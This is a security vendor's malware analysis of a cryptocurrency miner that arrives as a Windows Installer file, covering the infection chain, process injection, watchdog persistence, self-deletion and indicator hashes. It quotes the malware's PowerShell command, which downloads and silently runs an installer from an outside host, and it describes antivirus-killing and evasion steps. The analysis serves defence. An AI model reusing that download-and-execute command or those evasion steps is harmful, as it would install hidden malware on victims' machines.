( Original text by by Janus Agcaoili and Gilbert Sison )
The prodigious ascent of cryptocurrency-mining malware was not only brought about by its high profit potential, but also due to its ability to remain undetected within a system, especially when combined with various obfuscation routines. The concept of a stealthy, difficult-to-detect malware operating behind the scenes has proven to be an irresistible proposition for many threat actors, and they’re evidently adding even more techniques, as seen in a cryptocurrency miner (detected as Coinminer.Win32.MALXMR.TIAOODAM) we discovered that uses multiple obfuscation and packing as part of its routine.
Installation behavior
Figure 1. Infection chain for the malware
The malware arrives on the victim’s machine as a Windows Installer MSI file, which is notable because Windows Installer is a legitimate application used to install software. Using a real Windows component makes it look less suspicious and potentially allows it to bypass certain security filters.
Upon installation of the sample we analyzed, we found that it will install itself in the directory %AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server, which will be created if it isn’t already present in the user’s machine. This directory will contain various files that are used as part of its process:
- bat – A script file used to terminate a list of antimalware processes that are currently running
- exe – An unzipping tool used for another file dropped in the directory, icon.ico
- ico – A password protected zip file posing as an icon file
Unpacking icon.ico reveals two addition files contained within it:
- ocx – The loader module responsible for decrypting and installing the cryptocurrency mining module
- bin – The encrypted, UPX-packed and Delphi-compiled cryptocurrency mining module
The next part of the installation process involves creating copies of the kernel file ntdll.dll and the Windows USER component user32.dll in %AppData%\Roaming\Microsoft\Windows\Template\FileZilla Server\{Random Numbers}. We theorize that this is done to possibly prevent detection of the malware’s APIs. This is followed by the following configuration files, including the miner’s, being dropped in the folder %UserTemp%\[Random Number].
Figure 2. Configuration file for the miner
The installation interestingly uses Cyrillic (and not English) text during the process, which might indicate the region the malware came from.
Figure 3. One of the windows displayed during installation
Process injection and watchdog creation analysis
After installation, ex.exe will then perform its routine by unzipping icon.ico before executing the following command:
- rundll32 default.ocx,Entry u
It will then create three new Service Host (svchost.exe) processes for the purpose of injecting its codes. The first and second SvcHost processes will act as a watchdog, most likely to remain persistent. These are responsible for re-downloading the Windows Installer (.msi) file via a Powershell command when any of the injected svchost processes are terminated:
- “powershell.exe -command $cli = new-Object System.Net.WebClient;$cli.Headers[‘User-Agent’] = ‘Windows Installer’;$f = ‘C:\%UserTemp%\{random number}.msi’; $cli.DownloadFile(‘hxxps://superdomain1709[.]info/update[.]txt’, $f);Start-Process $f -ArgumentList ‘/q’”
The third SvcHost process is then injected with the coinminer module and executed using the following command:
- “%system32%\svchost.exe –config={malware configuration path}
Figure 4. Screenshot of the three Service Host processes
To make detection and analysis even more difficult, the malware also comes with a self-destruct mechanism. First, it creates and executes the following file:
- {Random Characters}.cmD <- self-delete command-line script
It then deletes every file under its installation directory and removes any trace of installation in the system.
One notable aspect of the malware is that it uses the popular custom Windows Installer builder WiX as a packer, most likely as an additional anti-detection layer. This indicates that the threat actors behind it are exerting extra effort to ensure that their creation remains as stealthy as possible.
Trend Micro Solutions
The evolving aspect of cryptocurrency mining malware — constantly adding evasion techniques — means that powerful security tools are often needed to defend users from these kinds of threats.
Trend Micro endpoint solutions such as the Smart Protection Suites and Worry-Free Business Security solutions can protect users and businesses from threats by detecting malicious files and messages as well as blocking all related malicious URLs. The Trend Micro™ Deep Discovery™solution has an email inspection layer that can protect enterprises by detecting malicious attachments and URLs.
Trend Micro XGen™ security provides a cross-generational blend of threat defense techniques to protect systems from all types of threats, including ransomware and cryptocurrency-mining malware. It features high-fidelity machine learning on gateways and endpoints, and protects physical, virtual, and cloud workloads. With capabilities like web/URL filtering, behavioral analysis, and custom sandboxing, XGen security protects against today’s threats that bypass traditional controls; exploit known, unknown, or undisclosed vulnerabilities; either steal or encrypt personally identifiable data; or conduct malicious cryptocurrency mining. Smart, optimized, and connected, XGen security powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.
Indicators of Compromise (IoCs)
Detected as Trojan.BAT.TASKILL.AA
- 90ae20b30866bc6dbffd41869ccb642b3802f03d18df19e6c1dcab260bbeba7d
Detected as Coinminer.Win32.MALXMR.TIAOODAM
- 8de725e349bb8d373763470ca6bcfd45e0b86839519f216ff436d3b8452d2248
- 95bdcfb385acd09029e93f2d0024a4c8e9b3c0be8e5091b63d98e9d88b9cc33b
- ccd609dc059a7bed7bf33c6d7dbd155fb40cdfd7d0091a9809f7f158ecd181bc
- a3f34851af892bc0d257f911dd325ebbb959c26533a3c68f15773a633f6c4d38
- 8d9b5190aace52a1db1ac73a65ee9999c329157c8e88f61a772433323d6b7a4a
- 34d1ba59bc22c0b1c1ce46327efdf3286dec4c54e2482986a0478b27bb3cf48b
- 8be47acf7e9ce316d0b39b65363fc154a83f6946233eebf494216f01e52c44f5
- 9a2eaaba3357f4addbc56bc7eaa2288e813fdcd1cb086efb3ad20d912968a251